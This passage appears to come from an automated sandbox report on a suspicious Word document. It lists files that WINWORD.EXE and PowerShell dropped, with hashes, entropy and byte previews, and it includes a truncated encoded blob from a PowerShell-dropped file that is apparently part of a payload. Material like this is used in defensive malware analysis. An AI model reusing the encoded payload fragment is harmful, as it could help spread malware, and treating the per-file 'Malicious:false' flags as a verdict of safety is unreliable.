                                                                                                                                                        Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab91D9.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3256855
                                                                                                                                                        Entropy (8bit):7.996842935632312
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                                                        MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                                                        SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                                                        SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                                                        SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab9257.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3417042
                                                                                                                                                        Entropy (8bit):7.997652455069165
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                                                                                        MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                                                                                        SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                                                                                        SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                                                                                        SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DFE108C78A93A5D650.TMP

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):512
                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3::
                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Roaming\Dyrehospitalerne.Gra

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):436400
                                                                                                                                                        Entropy (8bit):5.960274162791494
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:EO61G+O/iBK93w89V6PRChZfwiqrlJeoL2AiW7URbxcB+Ozbck+iPgoMYKbqm5HZ:R6WeoF3TLfIbefN3kW21KL4W
                                                                                                                                                        MD5:979CD657B9AD349F524BC6D7C0565B04
                                                                                                                                                        SHA1:C8D835ED8E989828E19D1BAF7248A9062CB340F2
                                                                                                                                                        SHA-256:829917A5CE42BB892C697A8FD1CD21BC94EC26574E35750C6DE91C22030FA8AA
                                                                                                                                                        SHA-512:22D85CFDC7CC846D9861DBA55F37640144E246CEC42D0B14CC938E259A0EF302FD4AC81EF616D9440DD8C76DD2D1AF5634059BBD577176B25C6DF3326E2545B9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:6wJ/IXEBm7td3hUA6wL/xesC/cYDXCQEcQGbcQGbuU0DgbVxAZtxAZuBwX905VFxAZtxAZuB6cx3ZgdxAZvrAg/Q6wLo5HEBm7ojBAIGcQGb6wKpC+sCd0NxAZsxyusCgHjrAouuiRQL6wK+EnEBm9HicQGb6wIe6oPBBOsC1DVxAZuB+WOU2wJ8ynEBm+sCRkeLRCQE6wJAu+sCF/WJw+sCKLhxAZuBw5O6pgJxAZvrAupnuoPdE/BxAZvrAn3RgfIhWw9E6wJa7esCs6WB8qKGHLTrAhnscQGbcQGb6wKeCnEBm+sCLJ2LDBBxAZtxAZuJDBPrAo++6wIzUEJxAZtxAZuB+oiMBAB11nEBm3EBm4lcJAxxAZvrAivige0AAwAA6wIdm3EBm4tUJAhxAZvrAsOQi3wkBHEBm+sCtPyJ63EBm+sCIGeBw5wAAABxAZtxAZtTcQGbcQGbakDrAglI6wLVnInr6wLpr+sCC6nHgwABAAAAgPQCcQGbcQGbgcMAAQAA6wLOTHEBm1NxAZvrAuUXietxAZtxAZuJuwQBAABxAZtxAZuBwwQBAABxAZvrAlu+U+sCCL1xAZtq/+sCrkDrApylg8IF6wLHd+sC6zMx9nEBm3EBmzHJcQGbcQGbixrrAlBE6wJoVUHrAowx6wLaBDkcCnXycQGb6wKJd0ZxAZtxAZuAfAr7uHXdcQGb6wLR54tECvzrAusn6wJ6dCnw6wL7R+sCnZP/0usChelxAZu6iIwEAOsCRslxAZsxwOsCgoVxAZuLfCQMcQGbcQGbgTQH3U4lvusC6XJxAZuDwARxAZvrAq36OdB15HEBm3EBm4n76wJrsusCzgv/13EBm3EBm1mozbvdTiXYXLXMcYbHwD8x5kmg1M/hFrRQLOtUq5x89C3HPyzZueL1z9R/TPkhPzQyATYTd+6GHIlhs93BJz4Fd/0/sUMlQmj4Oj+pQyV/h6GDP6lDJezLaDuGBM/k6LMTJj80

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):30
                                                                                                                                                        Entropy (8bit):1.2389205950315936
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/II:A
                                                                                                                                                        MD5:83ACA52A2CD4F3F907881B4BFFCC793A
                                                                                                                                                        SHA1:306ADAACDEF753C3E4DEB49061887DF497001D82
                                                                                                                                                        SHA-256:B2ACEAA510C91D4A0FAF9F10718977501FB8CA7E7489577BBC8B30147700B004
                                                                                                                                                        SHA-512:D5A2958B2200C68FD1E4C639B523F3A5DB6D2E36962AE22766479FED68692D1A89459B1CCDFD7A44252EE09835704FEB08FA5A837D5DF65C59F04AED33DCD76F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.....-........................

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Generic INItialization configuration [folders]
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):50
                                                                                                                                                        Entropy (8bit):4.6038561897747226
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:M1+FUm4GC0Uv:M8LCj
                                                                                                                                                        MD5:EA6A0D1B052DC5DE1059FEBCF2309068
                                                                                                                                                        SHA1:FDAF13601481A540CFE5E51DCC66913ED1066C36
                                                                                                                                                        SHA-256:625F316DC7C7580E9F4D4832EEFB370EACBBA9E1E808291FD35E5F3A022AEECE
                                                                                                                                                        SHA-512:D8BE98679C92C913586B52C011D681DFB55AC2EBFE1501C356A1FAA1440ABCE82BD0FB15AC1AEA5784B5D033C855A308B9599F7B802853ABAF5A33B1D8BDDA06
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[doc]..pqg5u7vt.LNK=0..[folders]..pqg5u7vt.LNK=0..

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\pqg5u7vt.LNK

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 19 10:51:16 2024, mtime=Thu Dec 19 10:51:20 2024, atime=Thu Dec 19 10:51:17 2024, length=29184, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):960
                                                                                                                                                        Entropy (8bit):4.684392014864233
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8dZC00UlGIU/uCICHqXy74XTACmapGEJ8ycvOjAKhhlav1Cg44t2YZ/elFlSJmZc:8XtGwsHEGEJeKACsvkfqyFm
                                                                                                                                                        MD5:89CA47C9BED86A1FAFF5B3C890B69286
                                                                                                                                                        SHA1:4095079D203709B5D4281FB7D768015B5EB86117
                                                                                                                                                        SHA-256:A962228FE8405D6AEE2C12994F42DD7FB1356C9669A8B64BCAE3500A58E8E29F
                                                                                                                                                        SHA-512:D13DD813C3E70C1D5238096BAF964AFADCD142956969353801CE713B533EDD0EE49829E80BDFE6F0F10857FA2934B38CE21D6C75F3F2FC40B4EB9D21F3F111C7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:L..................F.... ...R.O.R.....Q.R.....O.R...r...........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.YV^....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Yi^..Public..f......O.I.Yi^....+...............<.........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....f.2..r...Yi^ .pqg5u7vt.doc..J......Yi^.Yi^..........................q.p.q.g.5.u.7.v.t...d.o.c.......K...............-.......J............F.......C:\Users\Public\pqg5u7vt.doc..%.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.p.q.g.5.u.7.v.t...d.o.c..........v..*.cM.jVD.Es.!...`.......X.......745773...........hT..CrF.f4... ..!.......,.......hT..CrF.f4... ..!.......,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):562113
                                                                                                                                                        Entropy (8bit):7.67409707491542
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                        MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                        SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                        SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                        SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1649585
                                                                                                                                                        Entropy (8bit):7.875240099125746
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                        MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                        SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                        SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                        SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):558035
                                                                                                                                                        Entropy (8bit):7.696653383430889
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                        MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                        SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                        SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                        SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):570901
                                                                                                                                                        Entropy (8bit):7.674434888248144
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                        MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                        SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                        SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                        SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):523048
                                                                                                                                                        Entropy (8bit):7.715248170753013
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                        MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                        SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                        SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                        SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3078052
                                                                                                                                                        Entropy (8bit):7.954129852655753
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                        MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                        SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                        SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                        SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
